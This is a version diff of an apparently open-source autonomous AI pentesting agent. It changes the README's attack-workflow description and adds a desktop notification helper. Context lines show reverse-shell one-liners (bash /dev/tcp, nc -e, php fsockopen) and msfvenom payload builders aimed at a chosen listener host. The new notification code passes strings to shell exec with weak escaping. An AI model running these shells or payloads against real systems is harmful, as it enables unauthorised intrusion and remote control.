pentesting 0.7.32 → 0.7.34

package/README.md

@@ -35,26 +35,61 @@ pentesting
 
 ---
 
-## ✨ Features
+## 🧠 Philosophy: Think Like a Hacker
+
+**Pentesting is not a brute-force tool.** It's an intelligent agent that thinks strategically.
+
+### Strategic Decision Framework
+
+Every action is evaluated using:
+
+```
+Value = (Probability × CVSS Impact) / Time Cost
+```
+
+The agent only executes actions with **confidence >50%**. Below that, it finds a better approach.
+
+### Self-Reflection Before Every Action
+
+Before running any tool, the agent asks:
+- "What exactly am I trying to learn?"
+- "Is this the FASTEST way to get that information?"
+- "Have I already tried this? What happened?"
+- "Is there a simpler approach?"
+
+### Mandatory Fallback Strategy
+
+When a tool fails, the agent immediately tries alternatives:
+
+| Task | Primary | Fallback 1 | Fallback 2 |
+|------|---------|------------|------------|
+| Subdomain | subfinder | ffuf | amass |
+| Directory | gobuster | ffuf | dirsearch |
+| Port Scan | rustscan | nmap | masscan |
+
+---
+
+## 🔥 Why Pentesting?
+
+| Feature | Traditional Tools | Pentesting Agent |
+|---------|-------------------|------------------|
+| Decision Making | Manual | AI-driven with confidence scoring |
+| Tool Selection | You choose | Auto-selects based on context |
+| Failure Handling | You retry | Auto-fallback to alternatives |
+| Attack Planning | Manual prioritization | CVSS-based priority matrix |
+| Context Awareness | None | Remembers all findings |
+| Reporting | Manual | Auto-generated findings |
+
+---
+
+## ✨ Core Capabilities
 
-### Core Capabilities
-- **Intelligent Agent**: Self-reflection and decision framework (inspired by Claude Code)
-- **Confidence Scoring**: Only acts on actions with >50% success probability
 - **10-Phase Attack Workflow**: Recon → Scan → Enum → Vuln Analysis → Exploitation → PrivEsc → Pivot → Persist → Exfil → Report
-- **Auto Docker Management**: Automatically pulls and starts `pentesting-tools` container
-- **Multi-Target Attack**: Register multiple targets and attack them sequentially
-- **Real-time Feedback**: See thinking process, tool calls, and results live
-- **ESC Interrupt**: Stop execution anytime with ESC key
-- **Rainbow Spinner**: Visual feedback with cycling colors
-
-### v0.7.16 New Features
-- **Self-Reflection**: Agent asks "Is this the fastest way?" before every action
-- **Decision Framework**: Value = (Probability × Impact) / Time Cost
-- **Concrete Tool Commands**: Exact ffuf, nmap, hydra syntax with wordlist paths
-- **Auto Docker**: Container starts automatically when tools are missing
-- **Thinking Display**: See `[thinking]` and `[reasoning]` messages
-- **Token Label**: Status bar shows `3k tok` instead of just `3k`
-- **Approval Fix**: "Approve always" now works correctly (no repeat prompts)
+- **Auto Docker Management**: Pulls and starts tool container automatically
+- **Multi-Target Attack**: Attack multiple targets sequentially
+- **Real-time Feedback**: See thinking process, tool calls, results live
+- **Session Persistence**: Save/resume attack sessions
+- **Context Compaction**: Automatic history summarization
 
 ---
 

package/dist/index.js

@@ -1925,7 +1925,7 @@ async function executeMetasploit(input) {
   return executeBash(`msfconsole -q -x "${command}; exit"`, { timeout: 3e5 });
 }
 async function generatePayload(input) {
-  const { payload_type, lhost, lport, platform: platform2, format, encoder, output } = input;
+  const { payload_type, lhost, lport, platform: platform3, format, encoder, output } = input;
   const payloads = {
     windows: {
       reverse_tcp: "windows/meterpreter/reverse_tcp",
@@ -1944,7 +1944,7 @@ async function generatePayload(input) {
       reverse_tcp: "python/meterpreter/reverse_tcp"
     }
   };
-  const payloadName = payloads[platform2]?.[payload_type] || `${platform2}/meterpreter/reverse_tcp`;
+  const payloadName = payloads[platform3]?.[payload_type] || `${platform3}/meterpreter/reverse_tcp`;
   let cmd = `msfvenom -p ${payloadName} LHOST=${lhost} LPORT=${lport}`;
   if (format) cmd += ` -f ${format}`;
   if (encoder) cmd += ` -e ${encoder}`;
@@ -2276,7 +2276,7 @@ async function executeMysqlClient(input) {
   return executeBash(cmd, { timeout: 6e4 });
 }
 async function executeReverseShell(input) {
-  const { type, lhost, lport, platform: platform2, encode } = input;
+  const { type, lhost, lport, platform: platform3, encode } = input;
   const shells = {
     bash: `bash -i >& /dev/tcp/${lhost}/${lport} 0>&1`,
     nc: `nc -e /bin/bash ${lhost} ${lport}`,
@@ -2285,7 +2285,7 @@ async function executeReverseShell(input) {
     php: `php -r '$sock=fsockopen("${lhost}",${lport});exec("/bin/bash <&3 >&3 2>&3");'`
   };
   if (type === "msfvenom") {
-    const payload = platform2 === "windows" ? "windows/x64/shell_reverse_tcp" : "linux/x64/shell_reverse_tcp";
+    const payload = platform3 === "windows" ? "windows/x64/shell_reverse_tcp" : "linux/x64/shell_reverse_tcp";
     return executeBash(`msfvenom -p ${payload} LHOST=${lhost} LPORT=${lport} -f exe -o /tmp/shell.exe && echo "Payload saved to /tmp/shell.exe"`);
   }
   let shellCmd = shells[type] || shells.bash;
@@ -6128,6 +6128,45 @@ function hasClipboardImage() {
   return false;
 }
 
+// src/utils/notification.ts
+import { exec as exec2 } from "child_process";
+import { platform as platform2 } from "os";
+function sendNotification(options) {
+  const { title, message, sound = true } = options;
+  const os = platform2();
+  try {
+    if (os === "darwin") {
+      const soundOption = sound ? 'sound name "Ping"' : "";
+      const script = `display notification "${escapeQuotes(message)}" with title "${escapeQuotes(title)}" ${soundOption}`;
+      exec2(`osascript -e '${script}'`);
+    } else if (os === "linux") {
+      exec2(`notify-send "${escapeQuotes(title)}" "${escapeQuotes(message)}"`);
+    } else if (os === "win32") {
+      const ps = `
+                [Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null
+                $Template = [Windows.UI.Notifications.ToastTemplateType]::ToastText02
+                $Xml = [Windows.UI.Notifications.ToastNotificationManager]::GetTemplateContent($Template)
+                $Xml.GetElementsByTagName('text')[0].AppendChild($Xml.CreateTextNode('${escapeQuotes(title)}')) | Out-Null
+                $Xml.GetElementsByTagName('text')[1].AppendChild($Xml.CreateTextNode('${escapeQuotes(message)}')) | Out-Null
+                $Notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier('Pentesting')
+                $Notifier.Show([Windows.UI.Notifications.ToastNotification]::new($Xml))
+            `;
+      exec2(`powershell -Command "${ps}"`);
+    }
+  } catch {
+  }
+}
+function escapeQuotes(str) {
+  return str.replace(/"/g, '\\"').replace(/'/g, "'\\''");
+}
+function notifyApprovalNeeded(toolName) {
+  sendNotification({
+    title: "Pentesting - Approval Required",
+    message: `Action requires approval: ${toolName}`,
+    sound: true
+  });
+}
+
 // src/config/theme.ts
 var THEME = {
   // Backgrounds (dark to light grays)
@@ -6743,6 +6782,7 @@ var App = ({ autoApprove = false, target }) => {
         toolInput: data.toolInput,
         riskLevel: data.riskLevel
       });
+      notifyApprovalNeeded(data.toolName);
       addMessage(MESSAGE_TYPE.SYSTEM, `APPROVAL NEEDED: ${data.toolName} (${data.riskLevel} risk)`);
       const inputPreview = Object.entries(data.toolInput).slice(0, 2).map(([k, v]) => `${k}=${typeof v === "string" ? v.slice(0, 40) : JSON.stringify(v).slice(0, 40)}`).join(", ");
       if (inputPreview) {

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.7.32",
+  "version": "0.7.34",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/index.js",